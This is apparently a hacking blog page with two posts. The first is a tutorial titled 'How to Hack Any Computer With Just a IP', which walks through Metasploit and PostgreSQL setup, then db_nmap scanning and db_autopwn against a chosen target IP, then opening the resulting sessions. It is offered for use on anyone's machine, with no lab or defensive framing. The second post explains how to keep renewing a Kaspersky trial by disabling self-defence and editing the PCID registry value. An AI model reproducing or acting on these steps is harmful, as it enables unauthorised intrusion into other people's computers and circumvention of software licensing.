Copy/paste disable

Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts

Friday, March 15, 2013

How to Hack Any Computer With Just a IP

Hello and welcome to my tutorial on how to hack any computer with just a IP.
In this tutorial you'll need

- Metasploit
- postgresql

Also: This only works on unpatched computer clients. So this tutorial will not work everytime, depending on the type of PC you're going to hack.

Metasploit is constantly updated, and there are in fact working remote exploits for newer OSes in it.
HOWEVER, not all systems will be vulnerable due to a router, firewall, or something else in the way.
Furthermore, a fully patched system will of course be safe against MSF, as MSF is a public tool using a collection of public exploits.

Make sure you download the right programs with your OS system. ( The one which you're currently supporting on your PC )

1. First you want to open up postgresql

Once it's open click



Start --> All Programs --> PostgreSQL 9.0 --> pgAdmin III
Then right click on your server and click connect. Remember to keep this open the whole time, otherwise it will fail and you'll have to restart again.



[Image: urdGwF8.png]

Now it's time to start. First


Start -- > All Programs --> Metasploit Framework
once you're there open up Metasploit gui.

Now in the CMD window type


db_connect postgres: ThePassYouChose@localhost:5432

Once you've connected type in


db_host
to make sure you've actually connected to the server.

If that is correct then type in


db_nmap 127.0.0.1
IMPORTANT NOTE: Where I typed 127.0.0.1 replace that with the IP you want to hack.

Now it's time to exploit shit.
Let's start. First type in


db_autopwn -t -p -e -s -b
It will start. This will take a while, so just wait.

Once it's done type in


sessions -l
to see what the scanner found. If it worked you should see a list of exploits :D

Now once you've got the exploits to hack the computer, you'll notice, that they're all numbed, and they names.

Just pick a name from the list and type in


sessions -i YOUR EXPLOIT NAME HERE
Or for a better example


sessions -i ExploitNumber

Whatever command you want to do remember to put


sessions -i


Good luck Thumbsup
Read More ->>

Thursday, June 2, 2011

How to use Kaspersky for Lifetime without Patch

Generally Kaspersky provide us 30 days trial period on its Anti-virus Product. So there are the few steps that you have to perform when your trial license going to expire after 30 days for getting a new trial license :

1. Delete old key and turn off self defense (Settings-Options in kaspersky and turn off Enable self-defense, and click OK).

2. Open Registry editor (click start in windows menu then goto run and write regedit and click Ok) and go through these :

For 32bit OS: HKEY_LOCAL_MACHINE \ SOFTWARE \ KasperskyLab \ protected \ AVP9 \ environment

For 64bit OS: HKEY_LOCAL_MACHINE \ SOFTWARE \ Wow6432Node \ KasperskyLab \ protected \ AVP9 \ environment

3. Right look for PCID and right click and modify three or four last numbers or letters example : (8F10C22F-6EF6-4378-BAB1-34722F6D454)
and enter any other three-letter four-number and close the Registry Editor.

Contact
4. Right click on Kaspersky icon in the task bar and choose exit.

5. Go to Start-Programs menu, open the Kaspersky and when you activate searching trial license and you have new license of a peaceful month.

6. Go to Kaspersky settings and turn on self-defense.

This is hardly a 2 minute job and you got again a trial period of 30 days, and there is no rush for more keys.

Note : Most of the patches that you will found on the net are basically work on that trick, they simply make the changes in the registry and change identification of your computer to the Kaspersky server, thus Kaspersky log server recognizes you as a new user and assigns you new trial license.
Read More ->>